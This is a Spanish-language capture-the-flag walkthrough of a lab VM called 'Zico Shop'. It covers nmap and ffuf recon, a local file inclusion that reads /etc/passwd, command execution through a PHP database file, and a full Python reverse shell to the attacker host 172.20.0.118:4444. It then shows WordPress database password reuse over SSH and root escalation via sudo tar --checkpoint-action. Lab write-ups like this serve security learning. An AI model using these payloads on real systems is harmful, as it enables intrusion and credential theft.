Zico Shop

Descubrimiento

NMAP

Empezamos con el NMAP.

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap -p 80 172.20.0.0/24 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-20 15:22 CET
Initiating ARP Ping Scan at 15:22
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:22, 4.73s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 27 hosts. at 15:22
Completed Parallel DNS resolution of 27 hosts. at 15:22, 0.03s elapsed
...
Initiating Parallel DNS resolution of 1 host. at 15:22
Completed Parallel DNS resolution of 1 host. at 15:22, 0.02s elapsed
Initiating SYN Stealth Scan at 15:22
Scanning 28 hosts [1 port/host]
Discovered open port 80/tcp on 172.20.0.146
Discovered open port 80/tcp on 172.20.0.22
Discovered open port 80/tcp on 172.20.0.124
Discovered open port 80/tcp on 172.20.0.116
Discovered open port 80/tcp on 172.20.0.139
Discovered open port 80/tcp on 172.20.0.106
Discovered open port 80/tcp on 172.20.0.168
Discovered open port 80/tcp on 172.20.0.158
Discovered open port 80/tcp on 172.20.0.3
Completed SYN Stealth Scan at 15:23, 20.04s elapsed (28 total ports)
Nmap scan report for 172.20.0.3
Host is up (0.82s latency).

Es la 172.20.0.146. Ahora toca el escaneo de todos los puertos.

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap -p- 172.20.0.146 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-20 15:28 CET
Initiating ARP Ping Scan at 15:28
Scanning 172.20.0.146 [1 port]
Completed ARP Ping Scan at 15:28, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.02s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 172.20.0.146 [65535 ports]
Discovered open port 22/tcp on 172.20.0.146
Discovered open port 80/tcp on 172.20.0.146
Discovered open port 111/tcp on 172.20.0.146
Discovered open port 41962/tcp on 172.20.0.146
Completed SYN Stealth Scan at 15:28, 15.81s elapsed (65535 total ports)
Nmap scan report for 172.20.0.146
Host is up (0.0039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
41962/tcp open  unknown
MAC Address: 08:00:27:88:0A:56 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.98 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Tiene 4 puertos, de los más interesante serían el 80:HTTP y 22:SSH.

HTTP

Hay una página web. Viendo la página, había un a URL que envía hacia http://172.20.0.146/view.php?page=tools.html.

Local File Inclusion

Parece que está incluyendo un archivo local, así que probaremos a incluir uno.

view-source:http://172.20.0.146/view.php?page=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
xavi:x:1001:1003:,,,:/home/xavi:/bin/bash

Tenemos un par de usuarios:

• zico
• xavi

Fuzzing

──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ffuf -u http://172.20.0.146/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404

        /'___\  /'___\           /.___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://172.20.0.146/FUZZ
 :: Wordlist         : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

view                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7ms]
tools                   [Status: 200, Size: 8355, Words: 3291, Lines: 186, Duration: 102ms]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 4ms]
index                   [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 1964ms]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 2ms]
img                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 2101ms]
vendor                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 1ms]
package                 [Status: 200, Size: 789, Words: 112, Lines: 30, Duration: 29ms]
LICENSE                 [Status: 200, Size: 1094, Words: 156, Lines: 22, Duration: 91ms]
less                    [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 196ms]
server-status           [Status: 403, Size: 293, Words: 21, Lines: 11, Duration: 67ms]
dbadmin                 [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]

Ha encontrado un dbadmin. Al entrar a la web a dicha URL hay un archivo llamado test_db.php. Parece ser un gestor de bases de datos de SQLite, pedía una contraseña… La contraseña era “admin”, obviamente la que he probado nada más entrar.

view-source:http://172.20.0.146/view.php?page=../../../../../usr/databases/filetest.php&cmd=id

SQLite format 3

@  

-â!

ÉÉ5

OtablefilefileCREATE TABLE 'file' ('text' TEXT)

ßß
Guid=33(www-data) gid=33(www-data) groups=33(www-data)

Tras todo el batiburrillo sí que está el Id del usuario.

Explotación

Reverse shell

view-source:http://172.20.0.146/view.php?page=../../../../../usr/databases/filetest.php&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22172.20.0.118%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [172.20.0.118] from (UNKNOWN) [172.20.0.146] 44624
/bin/sh: 0: can't access tty; job control turned off
$
$ /bin/bash
whoami
www-data
pwd
/var/www
exit
$ pwd
/var/www
$

Exploración

www-data@ciber-4:/tmp$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root root 4096 Feb  3 19:25 .
drwxr-xr-x 24 root root 4096 Jun  1  2017 ..
drwxr-xr-x  3 xavi xavi 4096 Feb  3 19:32 xavi
drwxr-xr-x  7 zico zico 4096 Feb  3 16:55 zico

En la de xavi no hay nada.

www-data@ciber-4:/tmp$ ls -la /home/xavi
ls -la /home/xavi
total 24
drwxr-xr-x 3 xavi xavi 4096 Feb  3 19:32 .
drwxr-xr-x 4 root root 4096 Feb  3 19:25 ..
-rw------- 1 xavi xavi    0 Feb  3 19:41 .bash_history
-rw-r--r-- 1 xavi xavi  220 Feb  3 19:25 .bash_logout
-rw-r--r-- 1 xavi xavi 3486 Feb  3 19:25 .bashrc
drwx------ 2 xavi xavi 4096 Feb  3 19:31 .cache
-rw-r--r-- 1 xavi xavi  675 Feb  3 19:25 .profile

El usuario zico sí tiene cosas interesantes.

www-data@ciber-4:/tmp$ ls -la /home/zico
ls -la /home/zico
total 9248
drwxr-xr-x  7 zico zico    4096 Feb  3 16:55 .
drwxr-xr-x  4 root root    4096 Feb  3 19:25 ..
-rw-------  1 zico zico     993 Feb  3 19:30 .bash_history
-rw-r--r--  1 zico zico     220 Jun  8  2017 .bash_logout
-rw-r--r--  1 zico zico    3486 Jun  8  2017 .bashrc
drwx------  2 zico zico    4096 Feb  3 16:55 .cache
-rw-r--r--  1 zico zico     675 Jun  8  2017 .profile
drw-------  2 zico zico    4096 Jun  8  2017 .ssh
-rw-------  1 zico zico    3509 Jun 19  2017 .viminfo
-rw-rw-r--  1 zico zico  504646 Jun 14  2017 bootstrap.zip
drwxrwxr-x 18 zico zico    4096 Jun 19  2017 joomla
drwxrwxr-x  6 zico zico    4096 Aug 19  2016 startbootstrap-business-casual-gh-pages
-rw-rw-r--  1 zico zico      61 Jun 19  2017 to_do.txt
drwxr-xr-x  5 zico zico    4096 Jun 19  2017 wordpress
-rw-rw-r--  1 zico zico 8901913 Jun 19  2017 wordpress-4.8.zip
-rw-rw-r--  1 zico zico    1194 Jun  8  2017 zico-history.tar.gz

Parece tener el historial de la bash comprimido. Como no tenemos permisos aquí, toca probar descomprimir en /tmp.

www-data@ciber-4:/home/zico$ tar xvf zico-history.tar.gz -C /tmp
tar xvf zico-history.tar.gz -C /tmp
zico-history/
zico-history/zico-history.txt

Menudo zambombazo me he pegado. Parece que es la historia del personaje Zico o lo que sea.

www-data@ciber-4:/home/zico$ cat /tmp/zico-history/zico-history.txt
cat /tmp/zico-history/zico-history.txt
https://en.wikipedia.org/wiki/Zico

Arthur Antunes Coimbra, born 3 March 1953 in Rio de Janeiro), better know Zico, is a Brazilian coach and former footballer, who played as an attacking midfielder. Often called the "White Pelé", he was a creative playmaker, with excellent technical skills, vision, and en eye for goal, who is considered one of the most clinical finishers and best passers ever, as well as one of the greatest players of all time.[2][3][4] Arguably the world's best player of the late 1970s and early 80s, he is regarded as one of the best playmakers and free kick specialists in history, able to bend the ball in all directions.[5] In 1999, Zico came eighth in the FIFA Player of the Century grand jury vote, and in 2004 was named in the FIFA 100 list of the world's greatest living players.[6][7] According to Pelé, generally considered the best player ever, "throughout the years, the one player that came closest to me was Zico".[8]

With 48 goals in 71 official appearances for Brazil, Zico is fifth highest goalscorer for his national team.[9] He represented them in the 1978, 1982 and 1986 World Cups. They did not win any of those tournaments, even though the 1982 squad is considered one of the greatest Brazilian national squads ever.[10] Zico is often considered one of the best players in football history not to have been on a World Cup winning squad. He was chosen 1981[11] and 1983 Player of the Year.

Zico has coached the Japanese national team, appearing in the 2006 FIFA World Cup and winning the Asian Cup 2004, and Fenerbahçe, who were a quarter-finalist in 200 in the Champions League under his command. He was announced as the head coach of CSKA Moscow in January 2009. On 16 September 2009, Zico was signed by Greek side Olympiacos for a two-year contract after the club's previous coach, Temuri Ketsbaia, was sacked. He was fired four months later, on 19 January 2010.[

Toca cambiar de objetivo. A ver que tal el Wordpress. Parece que lo tiene descomprimido y configurado en su propio /home al menos.

www-data@ciber-4:/home/zico$ ls -la wordpress
ls -la wordpress
total 196
drwxr-xr-x  5 zico zico  4096 Jun 19  2017 .
drwxr-xr-x  7 zico zico  4096 Feb  3 16:55 ..
-rw-r--r--  1 zico zico   418 Sep 25  2013 index.php
-rw-r--r--  1 zico zico 19935 Jan  2  2017 license.txt
-rw-r--r--  1 zico zico  7413 Dec 12  2016 readme.html
-rw-r--r--  1 zico zico  5447 Sep 27  2016 wp-activate.php
drwxr-xr-x  9 zico zico  4096 Jun  8  2017 wp-admin
-rw-r--r--  1 zico zico   364 Dec 19  2015 wp-blog-header.php
-rw-r--r--  1 zico zico  1627 Aug 29  2016 wp-comments-post.php
-rw-r--r--  1 zico zico  2831 Jun 19  2017 wp-config.php
drwxr-xr-x  4 zico zico  4096 Jun  8  2017 wp-content
-rw-r--r--  1 zico zico  3286 May 24  2015 wp-cron.php
drwxr-xr-x 18 zico zico 12288 Jun  8  2017 wp-includes
-rw-r--r--  1 zico zico  2422 Nov 21  2016 wp-links-opml.php
-rw-r--r--  1 zico zico  3301 Oct 25  2016 wp-load.php
-rw-r--r--  1 zico zico 34327 May 12  2017 wp-login.php
-rw-r--r--  1 zico zico  8048 Jan 11  2017 wp-mail.php
-rw-r--r--  1 zico zico 16200 Apr  6  2017 wp-settings.php
-rw-r--r--  1 zico zico 29924 Jan 24  2017 wp-signup.php
-rw-r--r--  1 zico zico  4513 Oct 14  2016 wp-trackback.php
-rw-r--r--  1 zico zico  3065 Aug 31  2016 xmlrpc.php
www-data@ciber-4:/home/zico$ ls -la wordpress/wp-config.php
ls -la wordpress/wp-config.php
-rw-r--r-- 1 zico zico 2831 Jun 19  2017 wordpress/wp-config.php

OJITO con la configuración del WordPress. Parece que tiene la contraseña de un usuario de base de datos, aunque casualmente el usuario se llama igual que en el que estamos.

En el descubrimiento hemos visto que no habían puertos de SQL, pero sí de SSH, con lo que vale la pena comprobarlo.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');

/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');

SSH

Tenemos acceso a la máquina por SSH.

PS C:\Users\Usuario> ssh zico@172.20.0.146
zico@172.20.0.146's password:
zico@ciber-4:~$ id
uid=1000(zico) gid=1000(zico) groups=1000(zico)
zico@ciber-4:~$

Permisos

Revisamos los permisos que tiene el usuario en la máquina.

zico@ciber-4:~$ sudo -l
sudo: unable to resolve host ciber-4
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip

Hay dos permisos muy interesantes que nos permite usar permisos de administrador sin contraseña en los ejecutables de compresión.

Vamos a ver si hay algún otro permiso en otro archivo.

zico@ciber-4:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/sudoedit
/usr/bin/at
/sbin/mount.nfs
/bin/fusermount
/bin/umount
/bin/ping6
/bin/su
/bin/mount
/bin/ping

Explotación de binarios

Tal y como aparecía, hemos visto que hay un par de binarios de compresión con permisos de administrador.

Como no tengo ni idea de esto, toca mirar online. He encontrado un comando interesante en GTFObins, con el que se puede hacer una escalada de privilegios.

zico@ciber-4:~$ tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
$ whomai
/bin/sh: 1: whomai: not found
$ exit
zico@ciber-4:~$ tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
zico@ciber-4:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo: unable to resolve host ciber-4
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
#

El comando es sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh. Primero lo he hecho sin sudo, que para mi inocencia me ha devuelto en un usuario sin privilegios; para arreglarlo se me ha ocurrido hacer un bash en vez de sh, pero obviamente no ha funcionado. Después, ya iluminado se me ha ocurrido ejecutar el mismo comando con un sudo delante, y entrando así en root.

Y además parece que bash también funciona, cosa que me alegro, ya que la interfaz es más amigable.

zico@ciber-4:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo: unable to resolve host ciber-4
tar: Removing leading `/' from member names
root@ciber-4:~#

Flag

Y para terminar, aquí tenemos el flag.txt del usuario root.

root@ciber-4:~# cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#